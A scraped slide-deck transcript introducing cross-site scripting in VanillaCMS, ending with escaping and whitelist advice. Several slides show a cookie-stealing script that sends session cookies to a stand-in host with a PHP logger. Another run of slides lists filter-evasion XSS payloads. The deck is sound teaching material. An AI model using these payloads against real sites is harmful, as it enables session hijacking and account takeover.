Presentation is loading. Please wait.

Presentation is loading. Please wait.

Security & VanillaCMS An XSS Introduction and Attack Demonstration.

Published byDorthy Wright Modified over 8 years ago

Similar presentations

Presentation on theme: "Security & VanillaCMS An XSS Introduction and Attack Demonstration."— Presentation transcript:

1 Security & VanillaCMS An XSS Introduction and Attack Demonstration

2 XSS: An Introduction “Cross-Site Scripting” Using client-side code to send sensitive information off to far-away places. eg. Javascript

3 XSS: An Introduction Bobby Tables

4 XSS: An Introduction http://hax.gd/x.js Mallory Oh shit.

5 XSS: An Introduction That http://hax.gd/x.js script could be: alert('HA HA.');alert('Survive make your time.');

6 XSS: An Introduction That http://hax.gd/x.js script could be: document.write(document.cookie);

7 XSS: An Introduction That http://hax.gd/x.js script could be: document.write( ' '); <img src="http://hax.gd/x.php?award_visited=1;...;http://hax.gd/x.php __csuid=489058e83ee2e832;_PHPSESSID=t57tm1fvvdhonprigkdon71677" style="display:none;" />Mallory

8 XSS: An Introduction Let's have a look at http://hax.gd/x.php: <?php $fh=fopen('xss.log','a'); fwrite($fh,$_SERVER['HTTP_REFERER']. var_export($_GET,1)); fclose($fh); http://example/cms/objects.php?_obj_name=exa mple_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID=t57tm1fvvdhonprigkdon71677' => '',)‏

9 XSS: An Introduction So what? http://example/cms/objects.php?_obj_name=exa mple_data&_subnav=123 array('award_visited=1;__csuid=blah; _PHPSESSID= t57tm1fvvdhonprigkdon71677 ' => '',)‏

10 XSS: An Introduction Steal the cookie. Get the URL of the CMS. Log in at will, exposing the very soft underbelly that is the CMS. Time for a demo.

11

12 Filtering and Escaping Sometimes are conflated, with side-effects being things like backslashes or entity tags found in stored data. This is all very well and good, but what happens if you want to put this into an email message or save out to a text document? “Strip out all tags!” can result in mangled content: eg., 1 bar then”

13 Filtering and Escaping Validation & Filtering: Checking for and getting rid of the nasties. Checking data is of the correct type, eg. email addresses, postcodes, message text. Stripping out control characters, fixing multibyte encoding shenanigans with iconv(). Escaping: Packaging data up for transport. mysql_real_escape_string() for MySQL strings. htmlentities($x, ENT_QUOTES, 'UTF-8'); for HTML. urlencode() for query params.

14 Filtering and Escaping Why don't we just kill any tags we find? alert('a') ”> <IMG SRC=javascr ipt:aler t('XSS')> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72 &#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72 &#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> alert('a') alert("a");// RIPT>alert('a'); RIPT> <img src=”javascript:alert('a')” <IMG SRC = " j a v a s c r i p t : a l e r t ( ' a ' )‏ " >

15 Filtering and Escaping Why don't we just kill any tags we find? <iframe src=http://foo/x.html < BODY{-moz-binding:url("http://foo/x.xml#xss")} žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)‏ <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64, PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

16 Filtering and Escaping Why don't we just kill any tags we find? <DIV STYLE="background-image:\0075\0072\006C\0028'\006a \0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061 \006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> @im\port'\ja\vasc\ript:alert("a")'; exp/* alert('a');.x{background-image:url("javascript:alert('a')");} ]]>

17 Filtering and Escaping Yeah, no. The transport is HTML; package it appropriately. Using htmlentities($xsslol, ENT_QUOTES, 'UTF-8') will completely neuter most of this stuff. Use it even on the things you “trust” like $_SERVER['PHP_SELF'], or REQUEST_URI. It gets hard when you need to put user data into src=”” and style=”” fields; suggest using a whitelist instead, no matter how much of a pain it is to implement. (Or in the case of images and other files, generating the filename for them.)‏

Download ppt "Security & VanillaCMS An XSS Introduction and Attack Demonstration."

Similar presentations

PHP Form and File Handling

PHP Form and File Handling
Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.

Hossain Shahriar Mohammad Zulkernine. One of the worst vulnerabilities in web applications It involves the generation of dynamic HTML contents with invalidated.
Bypassing Client-Side Protection CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Bypassing Client-Side Protection CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.

1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.
JavaScript Forms Form Validation Cookies. What JavaScript can do  Control document appearance and content  Control the browser  Interact with user.

JavaScript Forms Form Validation Cookies. What JavaScript can do  Control document appearance and content  Control the browser  Interact with user.
Team Members: Brad Stancel,

Team Members: Brad Stancel,
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.

-Ajay Babu.D y5cs022.. Contents Who is hacker? History of hacking Types of hacking Do You Know? What do hackers do? - Some Examples on Web application.
Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.

Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.
Project 7 Discussion Section XSS and SQL Injection in Rails.

Project 7 Discussion Section XSS and SQL Injection in Rails.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.

Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Basic Web Application Security. User Input Kick Your Arse.

Basic Web Application Security. User Input Kick Your Arse.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.

 A cookie is a piece of text that a Web server can store on a user's hard disk.  Cookie data is simply name-value pairs stored on your hard disk by.
Client-Side programming with JavaScript 3

Client-Side programming with JavaScript 3
Secure Software Engineering: Input Vulnerabilities

Secure Software Engineering: Input Vulnerabilities

Similar presentations

Ads by Google